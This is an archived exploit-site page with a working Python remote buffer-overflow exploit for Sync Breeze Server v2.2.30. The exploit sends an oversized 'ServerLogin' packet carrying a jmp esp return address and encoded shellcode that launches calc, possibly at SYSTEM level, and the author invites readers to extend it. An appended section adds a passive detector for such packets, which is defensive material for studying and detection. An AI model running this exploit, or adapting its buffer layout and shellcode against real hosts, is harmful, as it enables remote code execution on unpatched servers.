
[remote exploits] - Sync Breeze Server v2.2.30 Remote BOF Exploit

Posted on 11 October 2010

=============================================
Sync Breeze Server v2.2.30 Remote BOF Exploit
=============================================

#!/usr/bin/python
# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely affected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A

### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin", the affected service (syncbrs.exe)
# will crash as the result of a buffer overflow. An attacker can easily leverage this vulnerability to control execution flow /
# execute arbitrary code.
###

# This PoC's Usage:
# 1. Verify that the service is running on the remote machine; the default port is 9121.
# 2. Execute syncbreeze.py against the host.
# 3. Check the remote machine's process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###

# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privilege escalation attack vector (although I have not verified this yet).
# I am sure a lot more can be done with this (fit more shellcode, universal etc.); I'll leave that up to researchers however.
# Have fun!
###

### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###

import sys, socket

if len(sys.argv) != 2:
    print "[!] Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

about  = "=================================================\n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC\n"
about += "Author: xsploited security\nURL: http://www.x-sploited.com/\n"
about += "Contact: xsploitedsecurity [at] gmail.com\n"
about += "=================================================\n"
print about

host = sys.argv[1]
port = 9121  # default server port, unchangeable (I think)

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = (
    "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c"
    "\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99"
    "\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8"
    "\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0"
    "\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5"
    "\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58"
    "\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb"
    "\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1"
    "\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b"
    "\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34"
    "\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c"
    "\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b"
    "\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab"
    "\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10"
    "\xc4\x73\x5f\x73\xf6\xe0\xe9\x10"
)

# Begin payload buffer:
packet_header = "\x53\x65\x72\x76\x65\x72\x4C\x6F\x67\x69\x6E\x02"  # "ServerLogin" + 0x02 command separator
junk = "\x90" * 256         # 256-byte junk buffer to reach eip
eip  = "\xFB\xF8\xAB\x71"   # jmp esp (via ws2_32.dll)
nops = "\x90" * 12          # small nop sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops

print "[*] Connecting to " + host + "...\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, Sending payload\n"
s.send(packet + "\n")
print "[*] Payload sent successfully"
print "[*] Check the results\n"
s.close()

# Inj3ct0r.com [2010-10-11]
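A detection-side counterpart, added here and not part of the original PoC: a passive checker for traffic to the Sync Breeze port that flags the conditions the advisory describes (a "ServerLogin" command longer than the 484-byte crash threshold, long runs of filler bytes, and a login body that is binary rather than text). Port 9121, the "ServerLogin" prefix and the 484-byte threshold come from the page; the record format, the run and non-printable heuristics and their cut-offs, and the sample traffic are assumptions constructed for the example.

```python
SYNCBREEZE_PORT = 9121           # default service port named on the page
LOGIN_PREFIX = b"ServerLogin"    # command prefix the vulnerable handler parses
MAX_SAFE_LOGIN_LEN = 484         # the page's stated crash threshold (bytes)

def longest_run(buf):
    # length of the longest run of one repeated byte value in buf
    best = cur = 0
    prev = None
    for b in buf:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best

def inspect_login_packet(data):
    """Return a list of findings for one raw TCP payload (empty if benign)."""
    findings = []
    if not data.startswith(LOGIN_PREFIX):
        return findings              # not a login command, nothing to judge
    if len(data) > MAX_SAFE_LOGIN_LEN:
        findings.append("oversized ServerLogin: %d bytes > %d"
                        % (len(data), MAX_SAFE_LOGIN_LEN))
    body = data[len(LOGIN_PREFIX):]
    run = longest_run(body)          # a long run of one byte is padding, not a credential
    if run >= 64:                    # assumed cut-off for this example
        findings.append("padding run of %d identical bytes" % run)
    nonprint = sum(1 for b in body if b < 0x20 or b > 0x7e)
    if body and nonprint * 2 > len(body):   # credentials are text, payloads are not
        findings.append("%d%% non-printable bytes in login body"
                        % (100 * nonprint // len(body)))
    return findings

def triage(records):
    # records are (src_ip, dst_port, payload); returns (src_ip, findings) per suspicious packet
    alerts = []
    for src, dport, payload in records:
        if dport == SYNCBREEZE_PORT:
            findings = inspect_login_packet(payload)
            if findings:
                alerts.append((src, findings))
    return alerts

# Constructed sample traffic: a normal login, an oversized login built from
# filler bytes only (no real shellcode), and an unrelated HTTP request.
SAMPLE_RECORDS = [
    ("10.0.0.5", 9121, b"ServerLogin\x02user=alice;pass=s3cret\n"),
    ("10.0.0.9", 9121, b"ServerLogin\x02" + b"\x90" * 256 + b"\x01\x02\x03\x04"
                       + b"\x90" * 12 + b"\xcc" * 230 + b"\n"),
    ("10.0.0.7", 80, b"GET / HTTP/1.0\r\n\r\n"),
]
```

Running `triage(SAMPLE_RECORDS)` reports only the 10.0.0.9 packet, with all three findings; a normal-length text login produces none.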
